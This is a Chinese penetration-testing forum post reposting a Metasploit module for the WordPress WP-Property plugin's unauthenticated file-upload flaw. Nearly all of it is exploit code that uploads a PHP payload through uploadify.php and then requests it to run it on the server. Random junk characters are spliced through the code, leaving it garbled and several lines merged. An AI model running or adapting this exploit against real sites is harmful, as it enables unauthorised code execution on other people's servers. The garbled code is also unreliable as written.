中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]

作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
! j3 v8 r: m! `, \, [( ?6 _$ ]: n2 K( N# x, @( n& e( k1 R
## # This file is part of the Metasploit Framework and may be subject to
3 |' U' l2 |: P" h) Q6 n6 N( B8 n
# redistribution and commercial restrictions. Please see the Metasploit
1 j- a! \# G8 i& D
! c2 F. T- J$ X" Y" x, W# Framework web site for more information on licensing and terms of use.
) j* e- h% G7 A  o0 s8 p/ f2 M) h* O$ S/ \
#   http://metasploit.com/framework/ ##
' N* t+ Z& `: t, Y1 x( l
) e/ P% R4 N. W$ V ' r# M9 a! n* b( j
# C+ F- s* {( ]6 g- n3 ]
4 d1 Y& G: Y6 s, [. e. v8 L! ~
% K5 y% w6 s+ E8 Y
require 'msf/core'6 H7 c$ ^4 Z3 Q# \' h& E" p
require 'msf/core/exploit/php_exe'. T* [- [) ^+ Y, R, v! x, @4 W

6 k6 `% n/ d" }9 aclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',% {5 }" z2 |* }1 E# o) E
'Description'    => %q{% {( e! s, E$ ^1 a1 _
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>( U; w+ Z* s) j
[
# H+ U5 p: r$ k% D'Sammy FORGIT', # initial discovery# r: H6 k2 q! k, [- V5 S
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
( j- Y8 B9 l- f6 p) A8 l; {+ `6 r],
( C) X+ f: D2 U5 V; q$ X'License'        => MSF_LICENSE,
. m/ D  _: R6 }) N; o$ @7 M'References'     =>
, n  p$ Z3 K/ }! A[$ @+ m1 w0 y3 {# C' A5 K) e
[ 'OSVDB', '82656' ],
: j7 J' p/ d* t& t[ 'BID', '53787' ],% t- T7 X1 F3 N  s/ P/ j
[ 'EDB', '18987'],
2 W# u" G$ U# @& w[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]/ i3 n' Q8 M2 {5 D, j+ r( n
],1 e5 ]4 [; ^+ D- X. p- l/ f+ m% ?
'Payload'        =>
& B+ F9 a  g& c" [6 A8 x{
1 }: N& K* E! a4 c'BadChars' => "\x00",
. K8 b. E% l0 P) m3 ], H3 `2 B},
5 _; p" O! F3 B# r# I2 \9 t'Platform'       => 'php',
9 |9 A0 |/ z2 M& u( }'Arch'           => ARCH_PHP,
: ?# n' Y* v, j( A% F' t4 d'Targets'        =>
! B. i6 _4 w# Q2 }. \[: l4 e$ j% g8 }0 {0 X- U
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],' q  c8 s9 z8 ?( S+ P5 P! V
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
  @7 b( L& ~0 r* e],  s8 d: k# S" R/ r: @
'DefaultTarget'  => 0,/ B6 d: M0 b" F) S1 b- W
'DisclosureDate' => 'Mar 26 2012'))
6 {3 F9 i2 h& V0 Y, n6 K+ s8 }% V9 y. U8 y# `
register_options(
( B5 U, {: |4 ]5 E[
+ T& A  I3 w3 U1 D9 d" ~OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) H9 |: {" `$ F
], self.class)
; V& w9 w+ ]2 @6 s& {2 H" }+ ]; B% Bend" q0 g9 f' k( o$ _( M- U, c7 w

9 e* u# p5 D! W- s' |, ~9 ldef check0 I: ^) B! z+ m8 v4 c' E6 t1 Q
uri =  target_uri.path4 w4 J1 l' l1 C3 y# j' x+ u. d
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',* v& x/ L/ E% p& w+ Q# R/ I: S
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"7 {- h6 J( @# z: F# s
})
1 a# ]8 n4 D! T5 w; @. F7 t9 \3 ?( [
if not res or res.code != 200# q* p3 H. H( Z& Z  d/ W
return Exploit::CheckCode::Unknown5 P: K. {+ f% H& [$ G) Q# Z
end
3 p7 R& P/ K- N6 @
2 @: A/ p: i7 Q$ ^0 T. k2 \% oreturn Exploit::CheckCode::Appears
4 k0 o. e5 g$ F  H, \0 Rend
2 [4 g) S/ r2 {* Q6 H7 g  T1 m& J. B8 y: a5 Q7 b4 Y; `8 H
def exploit
" Y! G% i% K& @2 ^6 turi =  target_uri.path
- X  G4 b0 [' q5 ^( R! e% Duri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
) Q$ [" p" Q: a5 f/ ~" T% v; A1 H0 R1 W1 [& u3 u: u! X, S
data = Rex::MIME::Message.new
# w) s% M2 P$ E" U" Xdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
' j/ ?; ^) @1 {% y; J, i1 U- @- zdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
, @2 \+ o8 J+ T" P1 spost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'); o6 |! R( I( @# f% G

7 J! U1 s" a% c- b6 v2 C9 W! ~2 cprint_status("#{peer} - Uploading payload #{@payload_name}")
2 X; P/ ^& b+ [2 M$ `7 \res = send_request_cgi({
4 n& R5 q' s' e' V1 C& \2 z1 }# }'method' => 'POST',' C' q; V7 z# K, I* C7 \# u
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",4 v7 h7 `7 R, L  F& A
'ctype'  => "multipart/form-data; boundary=#{data.bound}",- z* ]' t6 `6 h1 m- j2 o
'data'   => post_data
( ?3 ^1 v, a" R' D9 q4 v# T. X})
; U& V: t5 _( G% V; }7 x: A
2 D1 P7 Z9 g0 X- Vif not res or res.code != 200 or res.body !~ /#{@payload_name}/( \: ]6 s) A+ E0 H
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
6 @8 O6 Z' S" \+ w4 send
0 H0 o* G0 Q* j* x5 ^
' |+ e  ^9 a' C- g% U4 dupload_uri = res.body) T6 o9 R- ]8 S' M$ b
1 C$ P% \) M. d" r. A4 n4 E
print_status("#{peer} - Executing payload #{@payload_name}")
$ y2 }" j6 z0 I3 Z6 r# W+ w) fres = send_request_raw({
- _4 V+ ?( E: _) H7 ?, ^+ R'uri'    => upload_uri,
4 V! A1 S3 j+ x* o, \4 n) g6 _'method' => 'GET'- Z* @1 m) w+ A6 W( r
})
# w+ Y# D% f' J. U( }end
, W* q6 p' h, \+ w2 _- eend
* e; `  X; |) c) {# Z+ Y, N
; V5 \$ M7 s2 {+ O& ]不要问我这写的是什么 怎么利用 我是说msf.
: K" i  r% Z) Z) m& M# r  ]% m- R; e8 ~% k4 H) s





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2